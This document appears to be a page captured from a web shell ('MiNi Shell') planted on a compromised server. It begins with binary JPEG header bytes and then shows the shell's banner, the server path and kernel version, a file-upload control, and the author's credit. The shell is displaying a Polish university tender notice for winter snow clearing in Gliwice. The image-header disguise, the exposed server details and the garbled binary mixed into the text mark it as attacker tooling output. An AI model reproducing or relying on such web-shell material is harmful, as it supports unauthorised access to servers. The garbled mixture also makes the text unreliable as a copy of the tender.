JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211201/0029437501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa zimowego utrzymania powierzchni chodników i podjazdów dla osób niepełnosprawnych na terenie Politechniki Śląskiej w obszarze Gliwic <br/>sezon 2021/2022. Oznaczenie sprawy: IA1/U/21/62/EO </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Śląska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001637</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Akademicka 2A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(32) 237-13-34, 237-13-35</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">IA1@polsl.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.polsl.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa zimowego utrzymania powierzchni chodników i podjazdów dla osób niepełnosprawnych na terenie Politechniki Śląskiej w obszarze Gliwic <br/>sezon 2021/2022. Oznaczenie sprawy: IA1/U/21/62/EO </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0131d318-5295-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00294375</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000229/18/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.54 Usługa zimowego utrzymania powierzchni drogowej, parkingów, chodników i podjazdów dla osób niepełnosprawnych na terenie Politechniki Śląskiej w obszarze Gliwic sezon 2021/2022 (grupa U133)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.administracja.polsl.pl/zamowienia <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://polsl.logintrade.net/rejestracja/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a)<br/>Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy<br/>użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy Przetargowej Politechniki<br/>Śląskiej: https://polsl.logintrade.net/rejestracja/ oraz poczty elektronicznej: IA1@polsl.pl. Korzystanie z<br/>Platformy Przetargowej przez Wykonawcę jest bezpłatne.<br/>b) Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy<br/>pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez<br/>Internet. Wykonawca posiadający konto na Platformie Przetargowej ma dostęp do możliwości złożenia<br/>i wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz<br/>komunikację z Zamawiającym w pozostałych obszarach.<br/>c) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w zakładce „Instrukcje” na Platformie Przetargowej.<br/>d) Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy Przetargowej wynosi 150<br/>MB.<br/>e) Czas zapisywany jest w formacie YYYY-MM-DD HH:MM:SS. Czas przekazania danych na<br/>Platformę Przetargową jest to czas, w którym zostanie potwierdzone złożenie oferty, zawiadomienia,<br/>dokumentu lub oświadczenia przez Wykonawcę.<br/>f) Wykonawca może również przekazać ww. zawiadomienie, dokument lub oświadczenie (nie dotyczy oferty) na adres poczty elektronicznej Zamawiającego. Wykonawca, przekazując ww. zawiadomienie,<br/>dokument lub oświadczenie, żąda potwierdzenia dostarczenia wiadomości. Za datę przekazania<br/>zawiadomienia, dokumentu lub oświadczenia przyjmuje się datę otrzymania potwierdzenia<br/>dostarczenia wiadomości zawierającej ww. pliki/ załączniki z serwera pocztowego Zamawiającego.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem poczty elektronicznej Zamawiającego<br/>wynosi 10 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IA1/U/21/62/EO</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa w zakresie odśnieżania nawierzchni, likwidacji śniegu i<br/>lodu z powierzchni terenów wskazanych przez Zamawiającego (Zamawiający dopuszcza<br/>stosowanie odpowiednich środków i materiałów w celu obniżenia temperatury zamarzania wody,<br/>ale z uwzględnieniem przez Wykonawcę rodzaju nawierzchni - czyli materiału, z jakiego jest<br/>wykonana, celem uniknięcia jej uszkodzeń) i/lub posypywanie piaskiem lub mieszankami z solą,<br/>wskazanych powierzchni w razie potrzeby wraz z odpłużaniem, w miejscach tego<br/>wymagających.<br/>2. Wymagania dotyczące terminu wykonania zamówienia:<br/>Termin wykonania zamówienia: sukcesywnie w okresie od dnia zawarcia umowy do 31 marca<br/>2022 r. lub do wyczerpania wartości umowy (w zależności od tego co nastąpi wcześniej, z<br/>uwzględnieniem Prawa Opcji). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Prawo Opcji:<br/>a) Zamawiający skorzysta z opcji w przypadkach dla niego korzystnych, zgodnych z zapisami<br/>specyfikacji i wynikających z zawartej z Wykonawcą umowy, w szczególności:<br/>- w przypadku zwiększenia lub zmniejszenia zapotrzebowania na usługi objęte przedmiotem<br/>zamówienia w zależności od warunków atmosferycznych w sezonie zimowym 2021/2022;<br/>- w przypadku zwiększenia lub zmniejszenia utrzymywanego obszaru, jednak<br/>w zakresie nie większym niż 20% powierzchni określonej w opisie przedmiotu zamówienia.<br/>b) Ilości wskazane w Formularzu Ofertowym są ilościami prognozowanymi i Zamawiający<br/>zastrzega sobie prawo możliwości zakupu zleconych usług w ilości innej niż w nim wskazane.<br/>Rzeczywista ilość zleconych usług będzie wynikała z potrzeb Zamawiającego, zatem ilość<br/>faktycznie nabyta przez Zamawiającego może być zarówno mniejsza, jak i większa.<br/>Zamawiający zastrzega sobie możliwość niezamówienia wszystkich usług lub pełnej ilości<br/>danego rodzaju usług.<br/>c) Wykonawcy nie przysługuje wynagrodzenie za niezamówioną przez Zamawiającego część<br/>usług ujętą w Formularzu Ofertowym, jak również żadna rekompensata z tego tytułu.<br/>d) Łączna wartość umowy będzie równa kwocie obejmującej wartość pełnego zakresu usług<br/>zawartych w Formularzu Ofertowym powiększonej o 20%, tj. Zamawiający uprawniony jest do<br/>rozszerzenia zamówienia o 20% jego wartości. Zamawiający nie określa, które konkretnie<br/>elementy usługi będą realizowane w ramach opcji, a jedynie zastrzega sobie prawo zwiększenia<br/>ilości realizowanej usługi będącej przedmiotem zamówienia.<br/>e) Jednocześnie w ramach prawa opcji, Zamawiający zastrzega sobie prawo do realizacji<br/>zamówienia jedynie w zakresie ceny 1 zlecenia kompleksowej usługi zimowego utrzymania<br/>chodników i podjazdów dla niepełnosprawnych, wskazanej przez Wykonawcę w Formularzu<br/>Ofertowym. Kwota ta stanowi minimalne zobowiązanie Zamawiającego w ramach zawartej<br/>umowy. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> ZDOLNOŚĆ TECHNICZNA<br/>Wykonanie przez Wykonawcę (zakończenie) lub wykonywanie nie wcześniej niż 3 lata przed upływem terminu składania ofert co najmniej 1 usługi zimowego utrzymania terenów za min.<br/>10.000,00 zł brutto na powierzchni minimum 5 000 m2. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu,<br/>Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia odpisu lub<br/>informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące<br/>przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Zgodnie z art.<br/>127 ust. 2 ustawy Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych,<br/>które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność. Zgodnie z art. 274 ust. 4 ustawy Zamawiający nie wzywa do złożenia podmiotowych<br/>środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych,<br/>w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1, dane umożliwiające dostęp do tych środków.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Do oferty należy dołączyć stosowne pełnomocnictwo do reprezentowania ww. wykonawców,<br/>które powinno być przez nich udzielone (podpisane). Jeżeli została wybrana oferta wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem<br/>umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych<br/>wykonawców.<br/>Wykonawcy składający ofertę wspólną ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są<br/>wymagane. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, z którego wynika,<br/>które usługi wykonają poszczególni wykonawcy.<br/>Każdy z wykonawców występujących wspólnie musi z osobna wykazać brak podstaw<br/>wykluczenia z postępowania o udzielenie zamówienia.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o<br/>którym mowa w pkt 5.5.) niniejszego ogłoszenia składa każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenie to potwierdzać ma spełnianie warunków udziału<br/>w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Na mocy art. 455 ust. 1 pkt 1) ustawy Zamawiający przewiduje następujące zmiany<br/>postanowień zawartej umowy:<br/>1) zmiany strony umowy w przypadku następstwa prawnego wynikającego z odrębnych<br/>przepisów,<br/>2) zmiany terminu wykonania umowy w przypadku:<br/>a) wystąpienia zdarzeń siły wyższej – o czas trwania przeszkody; w rozumieniu niniejszej umowy<br/>„siła wyższa” jest to zdarzenie nadzwyczajne, zewnętrzne wobec stron i niemożliwe do<br/>zapobieżenia, którego nie udało się uniknąć nawet w wypadku maksymalnej staranności stron;<br/>strona powołująca się na stan siły wyższej jest zobowiązana do niezwłocznego pisemnego<br/>powiadomienia drugiej strony, a następnie do udokumentowania zaistnienia tego stanu; obie<br/>strony będą zwolnione od odpowiedzialności za nie wykonanie umowy w takim zakresie, w jakim<br/>nastąpiło to na skutek zdarzeń siły wyższej,<br/>b) ogłoszenia przez władze Państwowe stanu nadzwyczajnego lub stanu klęski żywiołowej,<br/>c) wystąpienia warunków atmosferycznych, uniemożliwiających wykonanie usługi przez<br/>Wykonawcę w zakresie opisanym w umowie i SWZ, tj. wystąpienia ponadnormatywnych opadów<br/>śniegu występujących bez przerwy powyżej 6 godzin lub z bardzo krótkimi przerwami, o<br/>przeciętnym i dosyć równomiernym natężeniu (większym niż 0,5 mm/godz.),<br/>ponadnormatywnych opadów deszczu, gradu, jeśli mowa o opadach ciągłych, występujących<br/>powyżej 6 godzin a ich wielkość mierzona w mm na 1 m2,<br/>d) wycofania z rynku lub zakończenia produkcji materiałów, których użycie przewidziano w toku<br/>realizacji przedmiotu umowy i konieczności zastąpienia ich innymi, o ile mają wpływ na<br/>wykonanie przedmiotu umowy,<br/>e) wystąpienia okoliczności leżących po stronie Zamawiającego lub niezawinionych przez<br/>Wykonawcę, uniemożliwiających rozpoczęcie, realizację w terminie lub kontynuowanie realizacji<br/>przedmiotu umowy,<br/>3) zmiany w kolejności i terminach płatności, w przypadku zmiany terminu lub sposobu realizacji<br/>zamówienia,<br/>4) zmiany materiałów, których użycie przewidziano w toku realizacji przedmiotu umowy, w<br/>przypadku wycofania ich z rynku lub zakończenia ich produkcji, jak również w przypadku<br/>możliwości zastąpienia tych materiałów, innymi o lepszych parametrach technicznych i wyżej<br/>zaawansowanych technicznie i technologicznie,<br/>5) poprawy jakości lub innych parametrów charakterystycznych dla danego elementu usługi lub<br/>zmiany technologii na równoważną lub lepszą, podniesienia wydajności przedmiotu zamówienia<br/>oraz bezpieczeństwa,<br/>6) zmiany sposobu wykonywania umowy:<br/>a) spowodowanych siłą wyższą w rozumieniu pkt 1 ppkt 2) lit. a), uniemożliwiającą wykonanie<br/>umowy zgodnie z jej postanowieniami,<br/>b) w przypadku ogłoszenia przez władze Państwowe stanu nadzwyczajnego lub stanu klęski<br/>żywiołowej,<br/>c) w przypadku wystąpienia warunków atmosferycznych, uniemożliwiających wykonanie usługi<br/>przez Wykonawcę w zakresie opisanym w umowie i SWZ, tj. wystąpienia ponadnormatywnych<br/>opadów śniegu występujących bez przerwy powyżej 6 godzin lub z bardzo krótkimi przerwami, o<br/>przeciętnym i dosyć równomiernym natężeniu (większym niż 0,5 mm/godz.),<br/>ponadnormatywnych opadów deszczu, gradu, jeśli mowa o opadach ciągłych, występujących<br/>powyżej 6 godzin a ich wielkość mierzona w mm na 1 m2, d) w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie,<br/>których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i<br/>doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony umowy,<br/>e) w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa, w tym prawa<br/>miejscowego w zakresie mającym wpływ na realizację przedmiotu umowy.<br/>4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może<br/>wyrazić zgodę i nie stanowią zobowiązania Zamawiającego do wyrażenia takiej zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w postępowaniu wyłącznie za pośrednictwem Platformy Przetargowej: https://polsl.logintrade.net/rejestracja/, zgodnie z treścią instrukcji pn. Udział w trybie podstawowym bez negocjacji, znajdującą się w zakładce „Instrukcje” na ww. Platformie. Nie dopuszcza się możliwości złożenia oferty za pośrednictwem poczty elektronicznej.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-09 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com